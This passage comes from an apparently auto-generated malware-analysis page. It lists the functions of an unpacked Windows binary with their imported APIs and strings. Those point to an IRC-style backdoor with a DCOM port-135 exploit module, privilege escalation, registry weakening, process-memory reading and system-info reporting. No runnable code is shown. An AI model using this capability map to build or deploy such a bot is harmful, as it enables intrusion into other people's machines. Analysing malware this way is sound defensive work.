</font></pre></td></tr><tr id="sub_415B93"><td><pre><a name="sub_415B93"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_415B93"><font size=+2>sub_415B93</a>(d3ca)</font>:<font color=darkgreen>
	KERNEL32.CreateToolhelp32Snapshot
	KERNEL32.Process32First
	KERNEL32.Process32Next
	KERNEL32.OpenProcess
	KERNEL32.CloseHandle
	KERNEL32.Module32First</font>
<font color=brown>
	"SeDebugPrivilege"
	" %s (%d)"
	"SeDebugPrivilege"
</font></pre></td></tr><tr id="sub_40CE56"><td><pre><a name="sub_40CE56"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40CE56"><font size=+2>sub_40CE56</a>(d545)</font>:<font color=darkgreen>
	WSOCK32.recv
	WS2_32.ntohl
	WS2_32.send
	WS2_32.closesocket</font>
<font color=brown>
	"%s%s"
	"a+b"
</font></pre></td></tr><tr id="sub_40AD3F"><td><pre><a name="sub_40AD3F"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AD3F"><font size=+2>sub_40AD3F</a>(d78e)</font>:<font color=brown>
	"@echo off\r\nEcho REGEDIT4>%temp%\\1.reg\r\n"...
	"c:\\a.bat"
</font></pre></td></tr><tr id="sub_40D8B7"><td><pre><a name="sub_40D8B7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D8B7"><font size=+2>sub_40D8B7</a>(dc5b)</font>:<font color=darkgreen>
	KERNEL32.GetLogicalDriveStringsA</font>
<font color=brown></font></pre></td></tr><tr id="sub_416561"><td><pre><a name="sub_416561"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_416561"><font size=+2>sub_416561</a>(dcb6)</font>:<font color=darkgreen>
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey</font>
<font color=brown>
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
</font></pre></td></tr><tr id="sub_40AA6F"><td><pre><a name="sub_40AA6F"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AA6F"><font size=+2>sub_40AA6F</a>(dcfe)</font>:<font color=darkgreen>
	USER32.FindWindowA
	USER32.SendMessageA</font>
<font color=brown>
	"mIRC"
</font></pre></td></tr><tr id="sub_40AFAB"><td><pre><a name="sub_40AFAB"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40AFAB"><font size=+2>sub_40AFAB</a>(e076)</font>:<font color=darkgreen>
	WS2_32.getsockname</font>
<font color=brown>
	"%d.%d.%d.%d"
</font></pre></td></tr><tr id="sub_40B051"><td><pre><a name="sub_40B051"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40B051"><font size=+2>sub_40B051</a>(e0a3)</font>:<font color=brown>
	"2"
</font></pre></td></tr><tr id="sub_406A64"><td><pre><a name="sub_406A64"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_406A64"><font size=+2>sub_406A64</a>(e1a1)</font>:<font color=darkgreen>
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.ntohs
	WS2_32.connect
	WS2_32.send
	WSOCK32.recv
	WS2_32.closesocket
	WS2_32.WSACleanup</font>
<font color=brown>
	"%s %s	HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
</font></pre></td></tr><tr id="sub_404737"><td><pre><a name="sub_404737"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_404737"><font size=+2>sub_404737</a>(e3f3)</font>:<font color=darkgreen>
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.socket
	WS2_32.connect
	WS2_32.send
	WSOCK32.recv
	WS2_32.closesocket</font>
<font color=brown>
	"Dcom135"
</font></pre></td></tr><tr id="sub_40C4F7"><td><pre><a name="sub_40C4F7"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40C4F7"><font size=+2>sub_40C4F7</a>(e4b2)</font>:<font color=brown>
	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
</font></pre></td></tr><tr id="sub_40DD32"><td><pre><a name="sub_40DD32"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DD32"><font size=+2>sub_40DD32</a>(e9d7)</font>:<font color=darkgreen>
	ADVAPI32.OpenSCManagerA
	ADVAPI32.OpenServiceA
	ADVAPI32.ControlService
	ADVAPI32.StartServiceA
	ADVAPI32.DeleteService
	ADVAPI32.CloseServiceHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_408E5A"><td><pre><a name="sub_408E5A"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_408E5A"><font size=+2>sub_408E5A</a>(ee8b)</font>:<font color=darkgreen>
	KERNEL32.FindFirstFileA</font>
<font color=brown>
	"%s\\*"
	"%s\\%s"
	" Found: %s\\%s"
</font></pre></td></tr><tr id="sub_408B8D"><td><pre><a name="sub_408B8D"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_408B8D"><font size=+2>sub_408B8D</a>(ef39)</font>:<font color=darkgreen>
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey</font>
<font color=brown>
	"%s\\%s"
	"r"
	"="
	"="
</font></pre></td></tr><tr id="sub_40DF52"><td><pre><a name="sub_40DF52"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40DF52"><font size=+2>sub_40DF52</a>(f2dd)</font>:<font color=darkgreen>
	ADVAPI32.OpenSCManagerA
	ADVAPI32.EnumServicesStatusA
	ADVAPI32.CloseServiceHandle</font>
<font color=brown>
	"The following	Windows	services are regi"...
	"	 Unknown"
	"	 Paused"
	"    Pausing"
	" Continuing"
	"    Running"
	"    Stoping"
	"   Starting"
	"    Stopped"
	"%s: %s (%s)"
</font></pre></td></tr><tr id="sub_40D7E5"><td><pre><a name="sub_40D7E5"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40D7E5"><font size=+2>sub_40D7E5</a>(f5ac)</font>:<font color=brown>
	"failed"
</font></pre></td></tr><tr id="sub_40BDAD"><td><pre><a name="sub_40BDAD"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40BDAD"><font size=+2>sub_40BDAD</a>(f77b)</font>:<font color=darkgreen>
	ADVAPI32.GetUserNameA
	WS2_32.inet_addr
	WS2_32.gethostbyaddr</font>
<font color=brown>
	"95"
	"NT"
	"98"
	"ME"
	"2K"
	"XP"
	"2003"
	"couldn't resolve host"
	"dd:MMM:yyyy"
	"HH:mm:ss"
	"[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
</font></pre></td></tr><tr id="sub_409307"><td><pre><a name="sub_409307"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_409307"><font size=+2>sub_409307</a>(fcc3)</font>:<font color=darkgreen>
	KERNEL32.GetProcessHeap
	NTDLL.RtlAllocateHeap
	KERNEL32.ReadProcessMemory</font>
<font color=brown></font></pre></td></tr><tr id="sub_41FAC2"><td><pre><a name="sub_41FAC2"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_41FAC2"><font size=+2>sub_41FAC2</a>(fe6c)</font>:<font color=darkgreen>
	KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_40C8F3"><td><pre><a name="sub_40C8F3"></a><a href="b19c0b33e50ce75e7b51dca8cb4d0ca5_unpacked.asm.html#sub_40C8F3"><font size=+2>sub_40C8F3</a>(ffba)</font>:<font color=darkgreen>
	WS2_32.closesocket
	WSOCK32.recv</font>
<font color=brown>
	"\n"
</font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html>